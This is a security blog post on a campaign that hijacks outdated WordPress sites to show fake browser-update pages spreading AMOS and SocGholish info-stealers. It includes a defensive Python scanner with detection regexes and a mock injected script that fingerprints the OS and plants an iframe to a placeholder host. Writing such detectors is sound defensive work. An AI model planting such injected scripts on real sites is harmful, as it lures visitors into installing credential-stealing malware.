A new info-stealing malware attack targets Windows and Mac users

Despite how much we all rely on the Internet, it’s no secret that browsing comes with both hidden and not-so-hidden dangers, such as hacked WordPress sites. A recent report has uncovered a new one: WordPress websites are being compromised and used to spread malware to both Windows and Mac users. This post goes into the details of this latest online threat: how hackers are compromising sites, the types of malware and what they do, and the potential consequences for unsuspecting visitors.

KEY TAKEAWAYS

  • The widespread compromise of WordPress sites shows that no platform is immune to security threats, especially when proper maintenance and updates are neglected.
  • This latest malware campaign uses social engineering, lack of knowledge, and multi-platform attacks to maximize its reach and effectiveness.
  • Cross-platform malware campaigns represent a growing threat, and the impact can be devastating, leading to data loss, financial theft, and identity fraud.
  • Prevention through regular maintenance and security best practices remains the most effective defense against website compromise and malware distribution.

What Is the Latest Hack?

We’ve been reporting a fair amount about WordPress news, and it seems that the world’s most popular CMS (Content Management System) can’t seem to ‘catch a break’. This time, it has nothing to do with the powers that be and how the platform is being run. Instead, there has been a wave of hackers hijacking WordPress websites to spread malware that infects both Windows and Mac operating systems… the fun just never ends.

Websites (including those built on WordPress) being taken over by cybercriminals and used to spread viruses, phishing scams, and a myriad of other types of malware to steal sensitive data is nothing new.

WordPress powers the backend of over 43% of all websites on the Internet, and most visitors don’t know it. While there’s nothing wrong with that, it comes with some fairly unique vulnerabilities when it comes to the core software and the plugins that are available in the WordPress.org library.

While WordPress is generally pretty safe, a recent report by the cybersecurity company c/side (c/side.dev) has unveiled a rather alarming new hack that is making the rounds.

C/side is a company that specializes in detecting and preventing browser attacks, particularly those involving third-party scripts. They have uncovered a trend where hackers specifically target WordPress sites running outdated software, gaining unauthorized access by exploiting gaps in outdated plugins and core software versions.

The report states that thousands of sites have been identified as hijacked, turning them into unwilling distribution points for some rather nasty code. The short version is that hackers target Windows and Mac operating systems via the browser, tricking online visitors into downloading and installing information-stealing malware.

According to c/side’s findings, this campaign has impacted over 10,000 WordPress websites globally. Simon Wijckmans, c/side founder and CEO, says it is still “very much live,” with some of the hacked sites being among the most popular on the web.

Using the detection techniques they’re known for, including internet crawling and reverse DNS lookups, the c/side team found infected sites and the domains hosting malicious scripts, which led them to discover the full extent of the campaign.

Himanshu Anand wrote up the company’s findings and said, “This is a widespread and very commercialized attack,” calling it a “spray and pray” attack. This means it will affect anyone visiting an infected site rather than targeting specific people, groups, or businesses.

How The Malware Infection Works

As we’ve covered, hackers are hijacking WordPress sites to spread malware for stealing passwords and other personal information from both Windows and Mac users. The way they are doing it usually works like this:

First, they find and target WordPress sites with outdated core software (the latest version is 6.7.1) and/or plugins with known vulnerabilities that allow them to gain unauthorized access.

Once they have gained access, the attackers inject JavaScript code into the website. This code is designed to detect the user’s operating system (either Windows or macOS) and deliver the malware built for that platform by triggering a fake page within an iframe.

Iframes are an HTML element that allows you to embed another HTML document in the current webpage. In this context, the iframes are used to display the fake update page, which can be done in a few ways, for example:

  • Redirection: The malicious script injected into the WordPress site might subtly redirect the user’s browser to the fake update page within an iframe, making the redirect less obvious.
  • Overlay: The fake page, contained in the iframe, could be overlaid on top of the legitimate website content, making it appear that the update notification is part of the website.

When users visit the compromised page, the injected script redirects them to a legitimate-looking page with a browser notification, prompting them to click and download an “update” in order to view the intended site.

Finally, if the visitor installs the “update”, they will instead be downloading a file containing malware that can steal their passwords and other sensitive personal and financial information.
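The injection chain described above leaves a detectable footprint in the HTML a compromised site serves. As an added example (not code from the article or from c/side), here is a small Python scanner that turns that description into heuristics for a site owner: it flags inline scripts that both fingerprint the OS and create an iframe, flags common obfuscation wrappers, and lists external script/iframe hosts that are not on an allowlist. The regexes, the sample pages and the placeholder hosts are all constructed for this example.

```python
import re
from html.parser import HTMLParser
# Heuristics for the pattern described above: an inline script that fingerprints the OS
# and then plants an iframe, or hides behind obfuscation. Regexes are this example's own.
OS_PROBE = re.compile(r"navigator\.(userAgent|platform)|\b(Windows|Macintosh|Mac OS)\b")
IFRAME_PLANT = re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)|<iframe", re.I)
OBFUSCATION = re.compile(r"\b(eval|atob|unescape)\s*\(|String\.fromCharCode")
HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)

class ScriptCollector(HTMLParser):
    """Gather inline <script> bodies and the hosts behind external script/iframe src."""
    def __init__(self):
        super().__init__()
        self.inline, self.hosts, self._in_script = [], set(), False
    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src") or ""
        if tag == "script":
            self._in_script = True
            self.inline.append("")
        m = HOST.match(src) if tag in ("script", "iframe") else None  # relative src: no match
        if m:
            self.hosts.add(m.group(1).lower())
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data

def scan_page(html, allowed_hosts):
    """Return a list of findings for one rendered page; an empty list means nothing flagged."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for body in p.inline:
        if OS_PROBE.search(body) and IFRAME_PLANT.search(body):  # the campaign's signature
            findings.append("inline script fingerprints OS and plants an iframe")
        elif OBFUSCATION.search(body):
            findings.append("obfuscated inline script")
    for host in sorted(p.hosts - set(allowed_hosts)):
        findings.append(f"external script/iframe from unlisted host: {host}")
    return findings

# Constructed sample pages (hosts are placeholders, not indicators from the report).
CLEAN_PAGE = """<html><head><script src="/wp-includes/js/jquery/jquery.min.js"></script>
</head><body><h1>Blog</h1><script>document.body.classList.add('ready');</script></body></html>"""
INJECTED_PAGE = CLEAN_PAGE.replace("</body>", """<script src="https://cdn-example.invalid/u.js"></script>
<script>var os = /Macintosh/.test(navigator.userAgent) ? 'mac' : 'win';
var f = document.createElement('iframe'); f.src = 'https://update-example.invalid/' + os;
document.body.appendChild(f);</script></body>""")
```

Run it over the HTML your site actually serves (fetched as a visitor would see it, since the injection lives in the rendered output), with your own CDN and analytics hosts in the allowlist.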

A Windows and Mac Double Threat

It is not the most sophisticated attack, given that the hackers rely on people falling for the fake update notification and subsequently installing the malware themselves. This means that the user unwittingly runs it, instead of the hacker, and manually bypasses their Windows and/or Mac’s built-in security.

The two types of malware that are used on the infected sites are Amos Atomic Stealer (AMOS) for macOS and SocGholish for Windows. Both are classified as info-stealers that run in the background without the user being aware until after the “damage” has been done.

As the name implies, they are designed to steal as much sensitive information as possible, including usernames and passwords, session cookies, and other data that will give hackers access into the victim’s accounts and crypto wallets to take as much information and digital currency as they can.

To make matters worse, another cybersecurity company reported that it had found hackers selling access to AMOS on Telegram.

This means that its creators are offering it as Malware-as-a-Service (MaaS) to other cybercriminals, who can then use it for their own attacks, kind of like Software-as-a-Service (SaaS) but for jerks.

WordPress Sites Hacked – Impact and Implications

The dual-threat nature of this campaign, targeting both Windows and Mac users, is a new low in malware distribution.

Compromising legitimate websites and turning them into online versions of Patient Zero is a particularly effective way of getting around the traditional security of both operating systems, while preying on the general trust most people tend to have when visiting these well-known WordPress websites.

The risks of unsecured websites and the consequences of a successful infection can be disastrous. Not only can the stolen login credentials give hackers access to personal accounts, including banking, email, crypto wallets, and social media, but the stolen data can be used for identity fraud and theft of funds, creating other nasty problems for victims, both financially and personally, and potentially damaging businesses and reputations.

Automattic’s Response

Automattic, one of the main companies that owns and manages WordPress.org and assists in the development of the WordPress CMS, was told about the hack and hijack by c/side and sent the list of malicious domains. Their contact at the company acknowledged receipt of the email.

Automattic said that the security of third-party plugins is ultimately the responsibility of the developer, with a spokesperson quoted as saying:

“There are specific guidelines that plugin authors must consult and adhere to ensure the overall quality of their plugins and the safety of their users. In addition, they have at their disposal a Plugin Handbook that covers numerous security topics, including best practices and managing plugins’ security.”

In all fairness, that statement has merit. The core WordPress software is regularly updated, and plugin developers should make sure their software is “as secure as possible”; it also raises the question: what, if anything, will Automattic do about it?

After all, technically speaking, WordPress is their baby, and great websites are built using it, while some are being used for less-than-savory purposes.

How You Can Prevent Falling Victim to Hacking Attempts

The massive scale and number of hijacked sites highlight the importance of regularly updating plugins, themes, and WordPress itself to the latest versions as soon as possible. These updates patch known security gaps, minimizing the risk of harmful code infections and other exploits.

Neglecting updates can leave your WordPress site vulnerable, potentially exposing you and your visitors to data breaches and theft.

To protect against this hack and other cyber threats:

  • Regular Updates: This is the most important one. In this scenario, outdated WordPress core software and plugins are the primary ways your website can get hacked. Enable automatic updates where possible.
  • Strong Passwords: Use unique passwords with upper- and lower-case letters, numbers, and special characters. Avoid using names, common words, birthdays, etc. and have different ones for different accounts.
  • Enable Two-Factor Authentication (2FA): 2FA adds an extra layer of security, making it much harder for attackers to gain access even if they have stolen a password.
  • Limit Login Attempts: This can help prevent brute-force attacks and unauthorized access.
  • Monitoring: Use security plugins or tools to scan for vulnerabilities and monitor suspicious activity, and a Web Application Firewall (WAF) to filter and block harmful traffic.
  • Backups: In case of a successful attack, having recent backups of your files and data is essential for restoring your WordPress website as quickly as possible. Always test your recovery methods to ensure they work correctly.
  • Security Plugins: Look at a well-coded and maintained security plugin that offers a comprehensive set of features, including malware scanning, firewall protection, and intrusion detection.

You should NEVER download updates or files from untrusted sources when browsing the Internet. This is especially important for any unexpected prompts or new windows, even if they appear on a website you trust.

Always verify that updates come directly from the official source, such as your browser’s settings or that particular software’s website—similarly, only download apps from official app stores or trusted sources.

Like the WordPress CMS and plugins, regular updates patch security vulnerabilities in your browser and operating system, reducing the risk of malware infections.

FAQs

How can I tell if my WordPress website has been compromised?

Look for unexpected changes in your site’s behavior, unauthorized admin users, unfamiliar files and code, or unusual traffic patterns. Use security plugins to scan for malware and monitor your site’s files for suspicious changes.

What versions of WordPress are vulnerable to this attack?

While specific version numbers aren’t mentioned in the c/side report, generally, any WordPress installation that isn’t running the latest version could be vulnerable. Always update to the newest version to ensure maximum security.

Can anti-virus software protect against these fake browser updates?

Most up-to-date anti-virus software can detect known AMOS and SocGholish variants but may not pick up new variations. It’s best to use a combination of anti-virus, safe browsing habits, software updates, and other security measures to protect against them.

Are there specific plugins that are being targeted?

The report doesn’t specify particular plugins, but outdated plugins are common sources for exploits. Regularly audit your plugins, removing any that are unused or are no longer being maintained.

What should I do if my site has been compromised?

If your site has been compromised, take it offline immediately, restore it from a clean backup, update WordPress core software and all plugins, change all passwords, and scan for any remaining malware.